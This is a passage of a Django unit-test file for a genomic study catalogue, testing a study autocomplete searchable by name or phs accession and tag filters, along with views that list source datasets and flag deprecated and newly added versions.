expected_pk = models.Study.objects.get(i_accession=expected_phs).pk
self.assertIn(expected_pk, returned_pks,
msg="Could not find expected phs {} with query '{}'".format(expected_phs, query))
class StudyNameOrPHSAutocompleteTest(UserLoginTestCase):
"""Autocomplete view works as expected."""
only_arg = '"unreviewed_non_archived_tagged_traits_only":true'
def setUp(self):
super(StudyNameOrPHSAutocompleteTest, self).setUp()
self.studies = []
test_phs_values = (5, 50, 500, 500000, 55, 555, 555555, 52, 520, 5200, )
test_names = ['abcde', 'abcdef', 'abcd_ef', 'abcd123', 'bcdefg', 'cdefgh', 'bcdefa',
'other1', 'other2', 'other3']
self.TEST_PHS_QUERIES = {
'5': (5, 50, 500, 500000, 55, 555, 555555, 52, 520, 5200, ),
'05': (),
'0005': (500, 555, 520, ),
'000005': (5, ),
'52': (52, 520, 5200, ),
'052': (),
'0052': (5200, ),
'00052': (520, ),
'555555': (555555, ),
'0': (5, 50, 500, 55, 555, 52, 520, 5200, ),
}
self.TEST_NAME_QUERIES = {
'a': ['abcde', 'abcdef', 'abcd_ef', 'abcd123', 'bcdefa'],
'abc': ['abcde', 'abcdef', 'abcd_ef', 'abcd123'],
'abcd1': ['abcd123'],
'b': ['abcde', 'abcdef', 'abcd_ef', 'abcd123', 'bcdefg', 'bcdefa'],
'abcde': ['abcde', 'abcdef'],
'abcdef': ['abcdef'],
'123': ['abcd123']
}
for name, phs in zip(test_names, test_phs_values):
self.studies.append(factories.StudyFactory.create(i_study_name=name, i_accession=phs))
def get_url(self):
return reverse('trait_browser:source:studies:autocomplete:by-name-or-phs')
def test_view_success_code(self):
"""View returns successful response code."""
tmp = self.get_url()
response = self.client.get(tmp)
self.assertEqual(response.status_code, 200)
def test_returns_all_studies_with_no_query(self):
"""Queryset returns all of the studies with no query."""
url = self.get_url()
response = self.client.get(url)
pks = get_autocomplete_view_ids(response)
self.assertEqual(sorted([study.pk for study in self.studies]), sorted(pks))
def test_correct_study_found_by_name(self):
"""Queryset returns only the correct study when found by whole study name."""
study_name = 'my_unlikely_study_name'
study = factories.StudyFactory.create(i_study_name=study_name)
url = self.get_url()
response = self.client.get(url, {'q': study_name})
returned_pks = get_autocomplete_view_ids(response)
self.assertEqual(returned_pks, [study.i_accession])
def test_correct_dataset_found_by_case_insensitive_name(self):
"""Queryset returns only the correct study when found by whole name, with mismatched case."""
study_name = 'my_unlikely_study_name'
study = factories.StudyFactory.create(i_study_name=study_name)
url = self.get_url()
response = self.client.get(url, {'q': study_name.upper()})
returned_pks = get_autocomplete_view_ids(response)
self.assertEqual(returned_pks, [study.i_accession])
def test_name_test_queries(self):
"""Returns only the correct studies for each of the TEST_NAME_QUERIES."""
url = self.get_url()
for query in self.TEST_NAME_QUERIES.keys():
response = self.client.get(url, {'q': query})
returned_pks = get_autocomplete_view_ids(response)
expected_matches = self.TEST_NAME_QUERIES[query]
self.assertEqual(len(returned_pks), len(expected_matches),
msg='Did not find correct number of matches for query {}'.format(query))
# Make sure the matches found are those that are expected.
for expected_name in expected_matches:
name_queryset = models.Study.objects.filter(i_study_name__iregex=r'^{}$'.format(expected_name))
self.assertEqual(name_queryset.count(), 1)
expected_pk = name_queryset.first().pk
self.assertIn(expected_pk, returned_pks,
msg='Could not find expected study name {} with query {}'.format(expected_name, query))
def test_phs_test_queries_without_phs_in_string(self):
"""Returns only the correct studies for each of the TEST_PHS_QUERIES when 'phs' is not in query string."""
url = self.get_url()
for query in self.TEST_PHS_QUERIES:
response = self.client.get(url, {'q': query})
returned_pks = get_autocomplete_view_ids(response)
expected_matches = self.TEST_PHS_QUERIES[query]
# Make sure number of matches is as expected.
self.assertEqual(len(returned_pks), len(expected_matches))
# Make sure the matches that are found are the ones expected.
for expected_phs in expected_matches:
expected_pk = models.Study.objects.get(i_accession=expected_phs).pk
self.assertIn(expected_pk, returned_pks,
msg="Could not find expected phs {} with query '{}'".format(expected_phs, query))
def test_phs_test_queries_with_phs_in_string(self):
"""Returns only the correct source datasets for each of the TEST_PHT_QUERIES when 'pht' is in query string."""
url = self.get_url()
for query in self.TEST_PHS_QUERIES:
response = self.client.get(url, {'q': 'phs' + query})
returned_pks = get_autocomplete_view_ids(response)
expected_matches = self.TEST_PHS_QUERIES[query]
# Make sure number of matches is as expected.
self.assertEqual(len(returned_pks), len(expected_matches))
# Make sure the matches that are found are the ones expected.
for expected_phs in expected_matches:
expected_pk = models.Study.objects.get(i_accession=expected_phs).pk
self.assertIn(expected_pk, returned_pks,
msg="Could not find expected phs {} with query '{}'".format(expected_phs, query))
def test_dataset_found_when_querying_number_in_name(self):
"""Queryset returns both studies when one has a name of NNN and the other has phs NNN."""
models.Study.objects.all().delete()
# Use a different study to ensure that one of the pre-created datasets doesn't match.
study_name = 'unlikely_24601_dataset'
# Use an accession that won't match for one dataset but not the other
name_match = factories.StudyFactory.create(i_study_name=study_name, i_accession=123456)
phs_match = factories.StudyFactory.create(i_study_name='other_name', i_accession=24601)
url = self.get_url()
response = self.client.get(url, {'q': 246})
returned_pks = get_autocomplete_view_ids(response)
self.assertEqual(sorted(returned_pks),
sorted([name_match.i_accession, phs_match.i_accession]))
def test_returns_all_studies_with_unreviewed_tagged_traits(self):
"""With no forwards, returns studies for unreviewed tagged traits."""
tag = TagFactory.create()
tagged_traits = []
for study in self.studies:
tmp = TaggedTraitFactory.create(trait__source_dataset__source_study_version__study=study, tag=tag)
tagged_traits.append(tmp)
get_data = {'q': ''}
response = self.client.get(self.get_url(), get_data)
pks = get_autocomplete_view_ids(response)
self.assertEqual(sorted([study.pk for study in self.studies]), sorted(pks))
def test_returns_all_studies_with_archived_tagged_traits(self):
"""With no forwards, returns studies for archived tagged traits."""
tag = TagFactory.create()
tagged_traits = []
for study in self.studies:
tmp = TaggedTraitFactory.create(trait__source_dataset__source_study_version__study=study,
archived=True, tag=tag)
tagged_traits.append(tmp)
get_data = {'q': ''}
response = self.client.get(self.get_url(), get_data)
pks = get_autocomplete_view_ids(response)
self.assertEqual(sorted([study.pk for study in self.studies]), sorted(pks))
def test_returns_all_studies_with_reviewed_tagged_traits(self):
"""With no forwards, returns studies for reviewed tagged traits."""
tag = TagFactory.create()
tagged_traits = []
for (idx, study) in enumerate(self.studies):
tmp = TaggedTraitFactory.create(trait__source_dataset__source_study_version__study=study, tag=tag)
tagged_traits.append(tmp)
if idx % 2 == 0:
status = DCCReview.STATUS_CONFIRMED
else:
status = DCCReview.STATUS_FOLLOWUP
DCCReviewFactory.create(tagged_trait=tmp, status=status)
get_data = {'q': ''}
response = self.client.get(self.get_url(), get_data)
pks = get_autocomplete_view_ids(response)
self.assertEqual(sorted([study.pk for study in self.studies]), sorted(pks))
def test_returns_all_studies_with_tagged_traits_for_multiple_tags(self):
"""With no forwards, returns studies for tagged traits with multiple tags."""
tagged_traits = []
for study in self.studies:
tmp = TaggedTraitFactory.create(trait__source_dataset__source_study_version__study=study)
tagged_traits.append(tmp)
get_data = {'q': ''}
response = self.client.get(self.get_url(), get_data)
pks = get_autocomplete_view_ids(response)
self.assertEqual(sorted([study.pk for study in self.studies]), sorted(pks))
def test_does_not_return_studies_without_tagged_traits_for_given_tag(self):
"""With tag forwarded, does not return studies without any tagged traits."""
tag = TagFactory.create()
study = self.studies[0]
tagged_trait = TaggedTraitFactory.create(tag=tag, trait__source_dataset__source_study_version__study=study)
other_study = self.studies[1]
get_data = {'q': '', 'forward': ['{"tag":"' + str(tag.pk) + '"}']}
response = self.client.get(self.get_url(), get_data)
pks = get_autocomplete_view_ids(response)
self.assertNotIn(other_study.pk, pks)
def test_does_not_return_studies_with_unreviewed_tagged_traits_with_other_tag_for_given_tag(self):
"""With tag forwarded, does not return studies for unreviewed tagged traits with other tags."""
tag = TagFactory.create()
study = self.studies[0]
tagged_trait = TaggedTraitFactory.create(tag=tag, trait__source_dataset__source_study_version__study=study)
other_tag = TagFactory.create()
other_study = self.studies[1]
other_tagged_trait = TaggedTraitFactory.create(
tag=other_tag, trait__source_dataset__source_study_version__study=other_study)
get_data = {'q': '', 'forward': ['{"tag":"' + str(tag.pk) + '"}']}
response = self.client.get(self.get_url(), get_data)
pks = get_autocomplete_view_ids(response)
self.assertNotIn(other_study.pk, pks)
def test_returns_study_with_unreviewed_tagged_trait_for_given_tag(self):
"""With tag forwarded, returns study with unreviewed tagged traits."""
tag = TagFactory.create()
study = self.studies[0]
tagged_trait = TaggedTraitFactory.create(tag=tag, trait__source_dataset__source_study_version__study=study)
get_data = {'q': '', 'forward': ['{"tag":"' + str(tag.pk) + '"}']}
response = self.client.get(self.get_url(), get_data)
pks = get_autocomplete_view_ids(response)
self.assertIn(study.pk, pks)
def test_returns_study_with_reviewed_needsfollowup_tagged_trait_for_given_tag(self):
"""With tag forwarded, returns study with reviewed tagged traits that need followup."""
tag = TagFactory.create()
study = self.studies[0]
tagged_trait = TaggedTraitFactory.create(tag=tag, trait__source_dataset__source_study_version__study=study)
dcc_review = DCCReviewFactory.create(tagged_trait=tagged_trait, status=DCCReview.STATUS_FOLLOWUP)
get_data = {'q': '', 'forward': ['{"tag":"' + str(tag.pk) + '"}']}
response = self.client.get(self.get_url(), get_data)
pks = get_autocomplete_view_ids(response)
self.assertIn(study.pk, pks)
def test_returns_study_with_reviewed_confirmed_tagged_trait_for_given_tag(self):
"""With tag forwarded, returns study with reviewed tagged traits that are confirmed."""
tag = TagFactory.create()
study = self.studies[0]
tagged_trait = TaggedTraitFactory.create(tag=tag, trait__source_dataset__source_study_version__study=study)
dcc_review = DCCReviewFactory.create(tagged_trait=tagged_trait, status=DCCReview.STATUS_CONFIRMED)
get_data = {'q': '', 'forward': ['{"tag":"' + str(tag.pk) + '"}']}
response = self.client.get(self.get_url(), get_data)
pks = get_autocomplete_view_ids(response)
self.assertIn(study.pk, pks)
def test_returns_study_with_archived_tagged_trait_for_given_tag(self):
"""With tag forwarded, returns study with archived tagged traits."""
tag = TagFactory.create()
study = self.studies[0]
tagged_trait = TaggedTraitFactory.create(
tag=tag, trait__source_dataset__source_study_version__study=study, archived=True)
get_data = {'q': '', 'forward': ['{"tag":"' + str(tag.pk) + '"}']}
response = self.client.get(self.get_url(), get_data)
pks = get_autocomplete_view_ids(response)
self.assertIn(study.pk, pks)
def test_returns_study_with_unreviewed_tagged_trait_for_given_tag_with_only(self):
"""With tag and only arg forwarded, returns study with unreviewed tagged trait."""
tag = TagFactory.create()
study = self.studies[0]
tagged_trait = TaggedTraitFactory.create(tag=tag, trait__source_dataset__source_study_version__study=study)
get_data = {'q': '', 'forward': ['{"tag":"' + str(tag.pk) + '",' + self.only_arg + '}']}
response = self.client.get(self.get_url(), get_data)
pks = get_autocomplete_view_ids(response)
self.assertIn(study.pk, pks)
def test_does_not_return_study_with_reviewed_confirmed_tagged_trait_for_given_tag_with_only(self):
"""With tag and only arg forwarded, does not return study with reviewed tagged traits."""
tag = TagFactory.create()
study = self.studies[0]
tagged_trait = TaggedTraitFactory.create(tag=tag, trait__source_dataset__source_study_version__study=study)
dcc_review = DCCReviewFactory.create(tagged_trait=tagged_trait, status=DCCReview.STATUS_CONFIRMED)
get_data = {'q': '', 'forward': ['{"tag":"' + str(tag.pk) + '",' + self.only_arg + '}']}
response = self.client.get(self.get_url(), get_data)
pks = get_autocomplete_view_ids(response)
self.assertNotIn(study.pk, pks)
def test_does_not_return_study_with_reviewed_needfollowup_tagged_trait_for_given_tag_with_only(self):
"""With tag and only arg forwarded, does not return study with reviewed tagged traits."""
tag = TagFactory.create()
study = self.studies[0]
tagged_trait = TaggedTraitFactory.create(tag=tag, trait__source_dataset__source_study_version__study=study)
dcc_review = DCCReviewFactory.create(tagged_trait=tagged_trait, status=DCCReview.STATUS_FOLLOWUP)
get_data = {'q': '', 'forward': ['{"tag":"' + str(tag.pk) + '",' + self.only_arg + '}']}
response = self.client.get(self.get_url(), get_data)
pks = get_autocomplete_view_ids(response)
self.assertNotIn(study.pk, pks)
def test_does_not_return_study_with_archived_tagged_trait_for_given_tag_with_only(self):
"""With tag and only arg forwarded, does not return study with archived tagged traits."""
tag = TagFactory.create()
study = self.studies[0]
tagged_trait = TaggedTraitFactory.create(
tag=tag, trait__source_dataset__source_study_version__study=study, archived=True)
get_data = {'q': '', 'forward': ['{"tag":"' + str(tag.pk) + '",' + self.only_arg + '}']}
response = self.client.get(self.get_url(), get_data)
pks = get_autocomplete_view_ids(response)
self.assertNotIn(study.pk, pks)
def test_does_not_return_study_with_no_tagged_traits_for_given_tag_with_only(self):
"""With tag and only arg forwarded, does not return study with archived tagged traits."""
tag = TagFactory.create()
study = self.studies[0]
get_data = {'q': '', 'forward': ['{"tag":"' + str(tag.pk) + '",' + self.only_arg + '}']}
response = self.client.get(self.get_url(), get_data)
pks = get_autocomplete_view_ids(response)
self.assertNotIn(study.pk, pks)
def test_does_not_return_studies_with_unreviewed_tagged_trait_with_other_tag_with_only(self):
"""With tag and only arg forwarded, does not return study with unreviewed tagged traits with other tag."""
tag = TagFactory.create()
study = self.studies[0]
tagged_trait = TaggedTraitFactory.create(tag=tag, trait__source_dataset__source_study_version__study=study)
other_tag = TagFactory.create()
other_study = self.studies[1]
other_tagged_trait = TaggedTraitFactory.create(
tag=other_tag, trait__source_dataset__source_study_version__study=other_study)
get_data = {'q': '', 'forward': ['{"tag":"' + str(tag.pk) + '",' + self.only_arg + '}']}
response = self.client.get(self.get_url(), get_data)
pks = get_autocomplete_view_ids(response)
self.assertNotIn(other_study.pk, pks)
def test_returns_all_studies_with_unreviewed_tagged_traits_without_given_tag_with_only(self):
"""With only arg but no tag forwarded, returns all studies."""
tag = TagFactory.create()
tagged_traits = []
for study in self.studies:
tmp = TaggedTraitFactory.create(trait__source_dataset__source_study_version__study=study, tag=tag)
tagged_traits.append(tmp)
get_data = {'q': '', 'forward': ['{' + self.only_arg + '}']}
response = self.client.get(self.get_url(), get_data)
pks = get_autocomplete_view_ids(response)
self.assertEqual(sorted([study.pk for study in self.studies]), sorted(pks))
def test_returns_all_studies_with_reviewed_tagged_traits_without_given_tag_with_only(self):
"""With only arg but no tag forwarded, returns studies with reviewed tagged traits."""
tag = TagFactory.create()
tagged_traits = []
for (idx, study) in enumerate(self.studies):
tmp = TaggedTraitFactory.create(trait__source_dataset__source_study_version__study=study, tag=tag)
tagged_traits.append(tmp)
if idx % 2 == 0:
status = DCCReview.STATUS_CONFIRMED
else:
status = DCCReview.STATUS_FOLLOWUP
DCCReviewFactory.create(tagged_trait=tmp, status=status)
get_data = {'q': '', 'forward': ['{' + self.only_arg + '}']}
response = self.client.get(self.get_url(), get_data)
pks = get_autocomplete_view_ids(response)
self.assertEqual(sorted([study.pk for study in self.studies]), sorted(pks))
def test_returns_all_studies_with_archived_tagged_traits_without_given_tag_with_only(self):
"""With only arg but no tag forwarded, returns studies with archived tagged traits."""
tag = TagFactory.create()
tagged_traits = []
for study in self.studies:
tmp = TaggedTraitFactory.create(trait__source_dataset__source_study_version__study=study,
archived=True, tag=tag)
tagged_traits.append(tmp)
get_data = {'q': '', 'forward': ['{' + self.only_arg + '}']}
response = self.client.get(self.get_url(), get_data)
pks = get_autocomplete_view_ids(response)
self.assertEqual(sorted([study.pk for study in self.studies]), sorted(pks))
def test_returns_all_studies_with_other_tag_without_given_tag_with_only(self):
"""With only arg but no tag forwarded, returns studies with tagged traits with other tag."""
tag = TagFactory.create()
study = self.studies[0]
tagged_trait = TaggedTraitFactory.create(tag=tag, trait__source_dataset__source_study_version__study=study)
other_tag = TagFactory.create()
other_study = self.studies[1]
other_tagged_trait = TaggedTraitFactory.create(
tag=other_tag, trait__source_dataset__source_study_version__study=other_study)
get_data = {'q': '', 'forward': ['{' + self.only_arg + '}']}
response = self.client.get(self.get_url(), get_data)
pks = get_autocomplete_view_ids(response)
self.assertIn(other_study.pk, pks)
self.assertEqual(sorted([study.pk for study in self.studies]), sorted(pks))
def test_returns_all_studies_without_tagged_traits_without_given_tag_with_only(self):
"""With only arg but no tag forwarded, returns even studies without any tagged traits."""
tag = TagFactory.create()
study = self.studies[0]
get_data = {'q': '', 'forward': ['{' + self.only_arg + '}']}
response = self.client.get(self.get_url(), get_data)
pks = get_autocomplete_view_ids(response)
self.assertEqual(sorted([study.pk for study in self.studies]), sorted(pks))
def test_does_not_return_study_with_deprecated_tagged_trait_for_given_tag_with_only(self):
"""With tag and only arg forwarded, does not return study with deprecated tagged traits."""
tag = TagFactory.create()
study = self.studies[0]
tagged_trait = TaggedTraitFactory.create(
tag=tag, trait__source_dataset__source_study_version__study=study,
trait__source_dataset__source_study_version__i_is_deprecated=True)
get_data = {'q': '', 'forward': ['{"tag":"' + str(tag.pk) + '",' + self.only_arg + '}']}
response = self.client.get(self.get_url(), get_data)
pks = get_autocomplete_view_ids(response)
self.assertNotIn(study.pk, pks)
class StudySourceTableViewsTest(UserLoginTestCase):
"""Unit tests for the SourceTrait by Study views."""
def test_study_source_table_one_page(self):
"""Tests that the study_source_table view works with fewer rows than will require a second page."""
# Make less than one page of Studies.
n_studies = TABLE_PER_PAGE - 2
factories.StudyFactory.create_batch(n_studies)
url = reverse('trait_browser:source:studies:list')
response = self.client.get(url)
# Does the URL work?
self.assertEqual(response.status_code, 200)
# Does the study table object have n_studies rows?
self.assertEqual(len(response.context['study_table'].rows), n_studies)
def test_study_source_table_two_pages(self):
"""Tests that the study_source_table view works with two pages' worth of rows."""
# Make less than one page of Studies.
n_studies = TABLE_PER_PAGE * 2
factories.StudyFactory.create_batch(n_studies)
url = reverse('trait_browser:source:studies:list')
response = self.client.get(url)
# Does the URL work?
self.assertEqual(response.status_code, 200)
# Does the study source table object have n_studies rows?
self.assertEqual(len(response.context['study_table'].rows), n_studies)
def test_study_source_get_search_url_response(self):
"""Tests that the get_search_url method returns a valid and correct url for a given study."""
this_study = factories.StudyFactory.create()
url = this_study.get_search_url()
response = self.client.get(url)
# url should work
self.assertEqual(response.status_code, 200)
self.assertIsInstance(response.context['form'], forms.SourceTraitSearchForm)
class SourceDatasetDetailTest(UserLoginTestCase):
"""Unit tests for the SourceDataset views."""
def setUp(self):
super(SourceDatasetDetailTest, self).setUp()
self.dataset = factories.SourceDatasetFactory.create()
self.source_traits = factories.SourceTraitFactory.create_batch(10, source_dataset=self.dataset)
def get_url(self, *args):
return reverse('trait_browser:source:datasets:detail', args=args)
def test_absolute_url(self):
"""get_absolute_url returns a 200 as a response."""
response = self.client.get(self.dataset.get_absolute_url())
self.assertEqual(response.status_code, 200)
def test_view_success_code(self):
"""View returns successful response code."""
response = self.client.get(self.get_url(self.dataset.pk))
self.assertEqual(response.status_code, 200)
def test_view_with_invalid_pk(self):
"""View returns 404 response code when the pk doesn't exist."""
response = self.client.get(self.get_url(self.dataset.pk + 1))
self.assertEqual(response.status_code, 404)
def test_context_data(self):
"""View has appropriate data in the context."""
response = self.client.get(self.get_url(self.dataset.pk))
context = response.context
self.assertIn('source_dataset', context)
self.assertEqual(context['source_dataset'], self.dataset)
self.assertIn('trait_table', context)
self.assertIsInstance(context['trait_table'], tables.SourceTraitDatasetTable)
self.assertIn('trait_count', context)
self.assertIn('is_deprecated', context)
self.assertIn('show_removed_text', context)
self.assertIn('new_version_link', context)
def test_context_deprecated_dataset_with_no_newer_version(self):
"""View has appropriate deprecation message with no newer version."""
source_study_version1 = self.dataset.source_study_version
source_study_version1.i_is_deprecated = True
source_study_version1.save()
source_study_version2 = factories.SourceStudyVersionFactory.create(
study=source_study_version1.study,
i_is_deprecated=False,
i_version=source_study_version1.i_version + 1
)
response = self.client.get(self.get_url(self.dataset.pk))
context = response.context
self.assertTrue(context['is_deprecated'])
self.assertTrue(context['show_removed_text'])
self.assertIsNone(context['new_version_link'])
self.assertContains(response, '<div class="alert alert-danger" role="alert" id="removed_deprecated_dataset">')
self.assertNotContains(
response, '<div class="alert alert-danger" role="alert" id="updated_deprecated_dataset">')
def test_context_deprecated_dataset_with_newer_version(self):
"""View has appropriate deprecation message with a newer version."""
study = factories.StudyFactory.create()
source_study_version1 = factories.SourceStudyVersionFactory.create(
study=study, i_is_deprecated=True, i_version=1)
source_study_version2 = factories.SourceStudyVersionFactory.create(
study=study, i_is_deprecated=False, i_version=2)
source_dataset1 = factories.SourceDatasetFactory.create(source_study_version=source_study_version1)
source_dataset2 = factories.SourceDatasetFactory.create(
source_study_version=source_study_version2,
i_accession=source_dataset1.i_accession,
i_version=source_dataset1.i_version,
i_is_subject_file=source_dataset1.i_is_subject_file,
i_study_subject_column=source_dataset1.i_study_subject_column,
i_dbgap_description=source_dataset1.i_dbgap_description
)
response = self.client.get(self.get_url(source_dataset1.pk))
context = response.context
self.assertTrue(context['is_deprecated'])
self.assertFalse(context['show_removed_text'])
self.assertEqual(context['new_version_link'], source_dataset2.get_absolute_url())
self.assertContains(response, context['new_version_link'])
self.assertNotContains(
response, '<div class="alert alert-danger" role="alert" id="removed_deprecated_dataset">')
self.assertContains(response, '<div class="alert alert-danger" role="alert" id="updated_deprecated_dataset">')
def test_context_deprecated_dataset_with_two_new_versions(self):
"""View has appropriate deprecation message with a newer version."""
study = factories.StudyFactory.create()
source_study_version1 = factories.SourceStudyVersionFactory.create(
study=study, i_is_deprecated=True, i_version=1)
source_study_version2 = factories.SourceStudyVersionFactory.create(
study=study, i_is_deprecated=True, i_version=2)
source_study_version3 = factories.SourceStudyVersionFactory.create(
study=study, i_is_deprecated=False, i_version=3)
source_dataset1 = factories.SourceDatasetFactory.create(source_study_version=source_study_version1)
source_dataset2 = factories.SourceDatasetFactory.create(
source_study_version=source_study_version2,
i_accession=source_dataset1.i_accession,
i_version=source_dataset1.i_version,
i_is_subject_file=source_dataset1.i_is_subject_file,
i_study_subject_column=source_dataset1.i_study_subject_column,
i_dbgap_description=source_dataset1.i_dbgap_description
)
source_dataset3 = factories.SourceDatasetFactory.create(
source_study_version=source_study_version3,
i_accession=source_dataset1.i_accession,
i_version=source_dataset1.i_version,
i_is_subject_file=source_dataset1.i_is_subject_file,
i_study_subject_column=source_dataset1.i_study_subject_column,
i_dbgap_description=source_dataset1.i_dbgap_description
)
response = self.client.get(self.get_url(source_dataset1.pk))
context = response.context
self.assertTrue(context['is_deprecated'])
self.assertFalse(context['show_removed_text'])
self.assertEqual(context['new_version_link'], source_dataset3.get_absolute_url())
self.assertContains(response, context['new_version_link'])
self.assertNotContains(
response, '<div class="alert alert-danger" role="alert" id="removed_deprecated_dataset">')
self.assertContains(response, '<div class="alert alert-danger" role="alert" id="updated_deprecated_dataset">')
class SourceDatasetListTest(UserLoginTestCase):
"""Unit tests for the SourceDataset views."""
def setUp(self):
super(SourceDatasetListTest, self).setUp()
self.datasets = factories.SourceDatasetFactory.create_batch(10)
for ds in self.datasets:
factories.SourceTraitFactory.create_batch(10, source_dataset=ds)
def get_url(self, *args):
return reverse('trait_browser:source:datasets:list')
def test_view_success_code(self):
"""View returns successful response code."""
response = self.client.get(self.get_url())
self.assertEqual(response.status_code, 200)
def test_context_data(self):
"""View has appropriate data in the context."""
response = self.client.get(self.get_url())
context = response.context
self.assertIn('source_dataset_table', context)
for ds in self.datasets:
self.assertIn(ds, context['source_dataset_table'].data)
self.assertIsInstance(context['source_dataset_table'], tables.SourceDatasetTableFull)
def test_no_deprecated_traits_in_table(self):
"""No deprecated datasets are shown in the table."""
# Set the ssv for three datasets to deprecated.
for ds in self.datasets[1:3]:
ssv = ds.source_study_version
ssv.i_is_deprecated = True
ssv.save()
response = self.client.get(self.get_url())
context = response.context
table = context['source_dataset_table']
for ds in self.datasets:
if ds.source_study_version.i_is_deprecated:
self.assertNotIn(ds, table.data)
else:
self.assertIn(ds, table.data)
def test_table_has_no_rows(self):
"""When there are no datasets, there are no rows in the table, but the view still works."""
models.SourceDataset.objects.all().delete()
response = self.client.get(self.get_url())
context = response.context
table = context['source_dataset_table']
self.assertEqual(len(table.rows), 0)
class StudySourceDatasetListTest(UserLoginTestCase):
"""."""
def setUp(self):
super(StudySourceDatasetListTest, self).setUp()
self.study = factories.StudyFactory.create()
self.datasets = factories.SourceDatasetFactory.create_batch(
3, source_study_version__i_is_deprecated=False, source_study_version__study=self.study)
for ds in self.datasets:
factories.SourceTraitFactory.create_batch(5, source_dataset=ds)
def get_url(self, *args):
return reverse('trait_browser:source:studies:pk:datasets:list', args=args)
def test_view_success_code(self):
"""View returns successful response code."""
response = self.client.get(self.get_url(self.study.pk))
self.assertEqual(response.status_code, 200)
def test_context_data(self):
"""View has appropriate data in the context."""
response = self.client.get(self.get_url(self.study.pk))
context = response.context
self.assertIn('study', context)
self.assertIn('trait_count', context)
self.assertIn('dataset_count', context)
self.assertEqual(context['study'], self.study)
traits = models.SourceTrait.objects.filter(source_dataset__source_study_version__study=self.study)
self.assertEqual(context['trait_count'], '{:,}'.format(traits.count()))
dataset_count = models.SourceDataset.objects.filter(source_study_version__study=self.study).count()
self.assertEqual(context['dataset_count'], '{:,}'.format(dataset_count))
def test_no_deprecated_traits_in_table(self):
"""No deprecated datasets are shown in the table."""
deprecated_datasets = factories.SourceDatasetFactory.create_batch(
3, source_study_version__i_is_deprecated=True, source_study_version__study=self.study)
for ds in deprecated_datasets:
factories.SourceTraitFactory.create_batch(5, source_dataset=ds)
response = self.client.get(self.get_url(self.study.pk))
context = response.context
table = context['source_dataset_table']
for dataset in deprecated_datasets:
self.assertNotIn(dataset, table.data)
for dataset in self.datasets:
self.assertIn(dataset, table.data)
def test_table_has_no_rows(self):
"""When there are no source traits, there are no rows in the table, but the view still works."""
models.SourceDataset.objects.all().delete()
response = self.client.get(self.get_url(self.study.pk))
context = response.context
table = context['source_dataset_table']
self.assertEqual(len(table.rows), 0)
class StudySourceDatasetNewListTest(UserLoginTestCase):
def setUp(self):
super().setUp()
self.study = factories.StudyFactory.create()
now = timezone.now()
self.study_version_1 = factories.SourceStudyVersionFactory.create(
study=self.study, i_version=1, i_date_added=now - timedelta(hours=2), i_is_deprecated=True)
self.study_version_2 = factories.SourceStudyVersionFactory.create(
study=self.study, i_version=2, i_date_added=now - timedelta(hours=1), i_is_deprecated=True)
self.study_version_3 = factories.SourceStudyVersionFactory.create(
study=self.study, i_version=3, i_date_added=now)
# Convert these lists to prevent queryset evaluation later on, after other datasets have been created.
# Create datasets for the first version.
self.datasets_v1 = list(factories.SourceDatasetFactory.create_batch(
5, source_study_version=self.study_version_1))
# Create datasets with the same accessions for the second and third versions.
for x in self.datasets_v1:
d2 = factories.SourceDatasetFactory.create(
source_study_version=self.study_version_2, i_accession=x.i_accession)
factories.SourceTraitFactory.create_batch(2, source_dataset=d2)
d3 = factories.SourceDatasetFactory.create(
source_study_version=self.study_version_3, i_accession=x.i_accession)
factories.SourceTraitFactory.create_batch(2, source_dataset=d3)
self.datasets_v2 = list(models.SourceDataset.objects.filter(source_study_version=self.study_version_2))
self.datasets_v3 = list(models.SourceDataset.objects.filter(source_study_version=self.study_version_3))
def get_url(self, *args):
return reverse('trait_browser:source:studies:pk:datasets:new', args=args)
def test_context_data(self):
"""View has appropriate data in the context."""
new_dataset = factories.SourceDatasetFactory.create(
source_study_version=self.study_version_3)
response = self.client.get(self.get_url(self.study.pk))
context = response.context
self.assertIn('study', context)
self.assertIn('trait_count', context)
self.assertIn('dataset_count', context)
self.assertEqual(context['study'], self.study)
self.assertEqual(context['trait_count'], '{:,}'.format(models.SourceTrait.objects.filter(
source_dataset__source_study_version=self.study_version_3).count()))
self.assertEqual(context['dataset_count'], '{:,}'.format(len(self.datasets_v3) + 1))
def test_no_deprecated_datasets_in_table(self):
"""No deprecated datasets are shown in the table."""
response = self.client.get(self.get_url(self.study.pk))
context = response.context
table = context['source_dataset_table']
for dataset in self.datasets_v1:
self.assertNotIn(dataset, table.data)
for dataset in self.datasets_v2:
self.assertNotIn(dataset, table.data)
def test_no_updated_datasets(self):
"""Table does not include new datasets that also exist in previous version."""
response = self.client.get(self.get_url(self.study.pk))
context = response.context
table = context['source_dataset_table']
for dataset in self.datasets_v3:
self.assertNotIn(dataset, table.data)
def test_no_removed_datasets(self):
"""Table does not include datasets that only exist in previous version."""
removed_dataset_1 = factories.SourceDatasetFactory.create(source_study_version=self.study_version_1)
removed_dataset_2 = factories.SourceDatasetFactory.create(
source_study_version=self.study_version_2, i_accession=removed_dataset_1.i_accession)
response = self.client.get(self.get_url(self.study.pk))
context = response.context
table = context['source_dataset_table']
self.assertNotIn(removed_dataset_1, table.data)
self.assertNotIn(removed_dataset_2, table.data)
self.assertEqual(len(table.data), 0)
def test_includes_one_new_dataset(self):
"""Table includes one new dataset in this version."""
new_dataset = factories.SourceDatasetFactory.create(source_study_version=self.study_version_3)
response = self.client.get(self.get_url(self.study.pk))
context = response.context
table = context['source_dataset_table']
self.assertIn(new_dataset, table.data)
def test_includes_two_new_datasets(self):
"""Table includes two new datasets in this version."""
new_datasets = factories.SourceDatasetFactory.create_batch(2, source_study_version=self.study_version_3)
response = self.client.get(self.get_url(self.study.pk))
context = response.context
table = context['source_dataset_table']
for new_dataset in new_datasets:
self.assertIn(new_dataset, table.data)
def test_no_previous_study_version(self):
"""Works if there is no previous version of the study."""
self.study_version_1.delete()
self.study_version_2.delete()
response = self.client.get(self.get_url(self.study.pk))
context = response.context
table = context['source_dataset_table']
self.assertEqual(len(table.data), 0)
for dataset in self.datasets_v3:
self.assertNotIn(dataset, table.data)
def test_does_not_compare_with_two_versions_ago(self):
"""Does not include datasets that were new in an older previous version but not the most recent version of the study.""" # noqa
new_dataset_2 = factories.SourceDatasetFactory.create(source_study_version=self.study_version_2)
new_dataset_3 = factories.SourceDatasetFactory.create(
source_study_version=self.study_version_3,
i_accession=new_dataset_2.i_accession)
response = self.client.get(self.get_url(self.study.pk))
context = response.context
table = context['source_dataset_table']
self.assertNotIn(new_dataset_3, table.data)
class SourceDatasetSearchTest(UserLoginTestCase):
